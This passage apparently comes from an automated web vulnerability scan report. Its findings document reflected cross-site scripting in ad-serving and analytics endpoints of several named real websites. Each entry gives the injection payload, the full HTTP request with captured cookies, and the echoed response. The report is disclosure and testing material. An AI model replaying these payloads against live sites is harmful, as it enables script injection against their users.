7realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/1159960079/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c?_RM_EMPTY_&385a6"><script>alert(1)</script>9acac63b02a=1" WIDTH=2 HEIGHT=2>

4.709. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]] [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]]

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 466bc"><script>alert(1)</script>0c124ef56d7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com466bc"><script>alert(1)</script>0c124ef56d7/video/1[randomNo]@x90]] HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:09:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 369
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com466bc"><script>alert(1)</script>0c124ef56d7/video/1[randomNo]/1667684471/x90]]/default/empty.gif/72634857383031444f386b4144567663?x" target="_top">
...[SNIP]...

4.710. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]] [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]]

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f667a"><script>alert(1)</script>b183b6c26c2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/videof667a"><script>alert(1)</script>b183b6c26c2/1[randomNo]@x90]] HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:09:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 369
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/videof667a"><script>alert(1)</script>b183b6c26c2/1[randomNo]/1897051802/x90]]/default/empty.gif/72634857383031444f386b4144567663?x" target="_top">
...[SNIP]...

4.711. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]] [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]]

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99d8a"><script>alert(1)</script>56928d72bf6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]]99d8a"><script>alert(1)</script>56928d72bf6 HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:09:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 369
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/video/1[randomNo]/2028974632/x90]]99d8a"><script>alert(1)</script>56928d72bf6/default/empty.gif/72634857383031444f386b4144567663?x" target="_top">
...[SNIP]...

4.712. http://onset.freedom.com/fi/analytics/cms/ [ctype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://onset.freedom.com
Path:   /fi/analytics/cms/

Issue detail

The value of the ctype request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bfbb"%3balert(1)//0c99605c03e was submitted in the ctype parameter. This input was echoed as 6bfbb";alert(1)//0c99605c03e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response body is a SiteCatalyst JavaScript file (it begins with var fiChildSAccount=...) served with Content-Type: text/html, and the captured Referer is a page on events.cbs6albany.com, which is where this script is loaded from. Loaded as a document, a text/html body that contains no script element is rendered as text and the injected alert(1) does not run; the injection executes when the embedding page includes this URL through a script src element, in that page's origin, which requires the embedding page to forward attacker-controlled values into the ctype or domain parameters. The same applies to 4.713 and 4.714.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section6bfbb"%3balert(1)//0c99605c03e&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1
Host: onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:50:05 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Expires: Sat, 29 Jan 2011 03:50:05 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 28740

var fiChildSAccount="fiwrgb";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/*****
...[SNIP]...
_c2f(c);return s(un,pg,ss)}


s.pageName="events.cbs6albany.com: zvents";
s.server="events.cbs6albany.com";
s.channel="entertainment";
s.pageType="";s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="section6bfbb";alert(1)//0c99605c03e";
s.prop5="entertainment|events|events";
s.prop6="";
s.prop7="";
s.prop8=""
s.prop9="";
s.prop10="";
s.prop11="";s.prop12="";
s.prop13="";
s.prop14=""
s.prop15="";s.prop16="";
s.prop17="";
s.prop18=""
...[SNIP]...

4.713. http://onset.freedom.com/fi/analytics/cms/ [domain parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://onset.freedom.com
Path:   /fi/analytics/cms/

Issue detail

The value of the domain request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab9fb"%3balert(1)//cd97779d75a was submitted in the domain parameter. This input was echoed as ab9fb";alert(1)//cd97779d75a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.comab9fb"%3balert(1)//cd97779d75a&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1
Host: onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:50:01 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Expires: Sat, 29 Jan 2011 03:50:01 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 28923

var fiChildSAccount="fiwrgb";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/*****
...[SNIP]...
<0){eval(c);return new
s_c(un,pg,ss)}else s=s_c2f(c);return s(un,pg,ss)}


s.pageName="events.cbs6albany.comab9fb";alert(1)//cd97779d75a: entertainment section front";
s.server="events.cbs6albany.comab9fb";alert(1)//cd97779d75a";
s.channel="entertainment";
s.pageType="";s.prop1="";
s.prop2="events.cbs6albany.comab9fb";alert(1)//cd97779
...[SNIP]...

4.714. http://onset.freedom.com/fi/analytics/cms/ [domain parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://onset.freedom.com
Path:   /fi/analytics/cms/

Issue detail

The value of the domain request parameter is copied into a JavaScript inline comment. The payload 9a661*/alert(1)//133025af296 was submitted in the domain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com9a661*/alert(1)//133025af296&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1
Host: onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:50:02 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Expires: Sat, 29 Jan 2011 03:50:02 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 28923

var fiChildSAccount="fiwrgb";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/*****
...[SNIP]...
+ s.pageName;
s.prop44="17:50";
s.eVar6="";
s.hier1="entertainment|root";
s.hier2="events.cbs6albany.com9a661*/alert(1)//133025af296|entertainment|events|events|root";
/** domain=events.cbs6albany.com9a661*/alert(1)//133025af296 **/

/** referer=http://events.cbs6albany.com/?376e5%22%3e%3cscript%3ealert(1)%3c/script%3ea7771aeaee3=1 **/
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(
...[SNIP]...

4.715. http://pixel.invitemedia.com/rubicon_sync [publisher_redirecturl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /rubicon_sync

Issue detail

The value of the publisher_redirecturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0717"><script>alert(1)</script>37c84a60207 was submitted in the publisher_redirecturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rubicon_sync?publisher_user_id=004826d0e57cb7385266145a629ee0301cc82296&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/a0717"><script>alert(1)</script>37c84a60207 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid="eyI0IjpbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsNzM0MTUxXX0="; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]}"; subID="{}"; dp_rec="{\"3\": 1296072684+ \"2\": 1295634039}"; segments="3391|3392|11262|11265|17277|38781|38582,1298044270|10102"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Fri, 28 Jan 2011 16:59:36 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Fri, 28-Jan-2011 16:59:16 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 264

<html><body><img width="0" height="0" src="http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/a0717"><script>alert(1)</script>37c84a60207?publisher_dsp_id=2101&external_user_id=82d726c3-44ee-407c-85c4-39a0b0fc11ef&Expiration=1296665976"/>
...[SNIP]...

4.716. http://pu.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pu.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46447"><script>alert(1)</script>ca3e148e25e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?46447"><script>alert(1)</script>ca3e148e25e=1 HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=gxuklwm2wc54o44500sn3n55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gxuklwm2wc54o44500sn3n55; path=/; HttpOnly
Set-Cookie: spvdr=vd=d5599b14-175a-410b-9d97-113f02fc9ecd&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:21 GMT; path=/
Set-Cookie: ipu=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:21 GMT
Connection: close
Content-Length: 21862
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||46447"><script>alert(1)</script>ca3e148e25e~1');return false;">
...[SNIP]...

4.717. http://pu.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pu.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e39ce'-alert(1)-'10f765ebe49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?e39ce'-alert(1)-'10f765ebe49=1 HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=2ix2kvm0dkimmd45cjweuero; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2ix2kvm0dkimmd45cjweuero; path=/; HttpOnly
Set-Cookie: spvdr=vd=918cb142-ac05-44ff-b781-bebd10f67a21&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:22 GMT; path=/
Set-Cookie: ipu=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:21 GMT
Connection: close
Content-Length: 21461
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=pu.imlive.com&ul=/?e39ce'-alert(1)-'10f765ebe49=1&qs=e39ce'-alert(1)-'10f765ebe49=1&qs=e39ce'-alert(1)-'10f765ebe49=1&iy=dallas&id=44&iu=1&vd=918cb142-ac05-44ff-b781-bebd10f67a21';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.718. http://raw.oggifinogi.com/GetScript.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://raw.oggifinogi.com
Path:   /GetScript.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e463c'%3balert(1)//756d2af6207 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e463c';alert(1)//756d2af6207 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /GetScript.aspx?oggiId=8a1e14f9-0430-4899-bc31-63608f1bee92&oggiWidth=728px&oggiHeight=90px&oggiCampaignId=d12ec800-d902-472d-9d0d-8a77a14a4187&oggiVary=&oggiImpolite=true&oggiClickTrack=http://media.fastclick.net/w/click.here?cid=279384&mid=521626&m=1&sid=54393&c=0&tp=5&forced_click=&oggiIsIframe=1&oggiSite=http%3A//www.bostonherald.com/track/&e463c'%3balert(1)//756d2af6207=1 HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:55:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, precheck=0, max-age=0
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2113

function Init41ef5a71_ed69_49f0_8bd6_a345576a5df8(){
       var playerDiv = document.createElement("div");
       playerDiv.id = 'oggiPlayerDiv41ef5a71_ed69_49f0_8bd6_a345576a5df8';
       playerDiv.setAttribute(
...[SNIP]...
tp%3d5%26forced_click%3d%22%7d');
       playerDiv.setAttribute("impolite", 'true');
       playerDiv.setAttribute("expandedMode",'');
       playerDiv.setAttribute("referrer", 'http://www.bostonherald.com/track/&e463c';alert(1)//756d2af6207=1');window.isIframe = true;
       
       var absentBody = false;

       if (document.getElementsByTagName("head").length == 0){
           var head = document.createElement("head");
           var html = document.getElemen
...[SNIP]...

4.719. http://raw.oggifinogi.com/GetScript.aspx [oggiHeight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://raw.oggifinogi.com
Path:   /GetScript.aspx

Issue detail

The value of the oggiHeight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76eda"%3balert(1)//b92a78ddf85 was submitted in the oggiHeight parameter. This input was echoed as 76eda";alert(1)//b92a78ddf85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px&oggiHeight=250px76eda"%3balert(1)//b92a78ddf85&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=&oggiImpolite=true&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:52:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, precheck=0, max-age=0
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2706

function Init6f9aa2cb_5369_48aa_9a3f_33d9405a469a(){
       var playerDiv = document.createElement("div");
       playerDiv.id = 'oggiPlayerDiv6f9aa2cb_5369_48aa_9a3f_33d9405a469a';
       playerDiv.setAttribute(
...[SNIP]...
<div id='oggiPlaceholder6f9aa2cb_5369_48aa_9a3f_33d9405a469a' style='width:300px;height:250px76eda";alert(1)//b92a78ddf85;'>
...[SNIP]...

4.720. http://raw.oggifinogi.com/GetScript.aspx [oggiHeight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://raw.oggifinogi.com
Path:   /GetScript.aspx

Issue detail

The value of the oggiHeight request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54460'%3balert(1)//d2008572656 was submitted in the oggiHeight parameter. This input was echoed as 54460';alert(1)//d2008572656 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

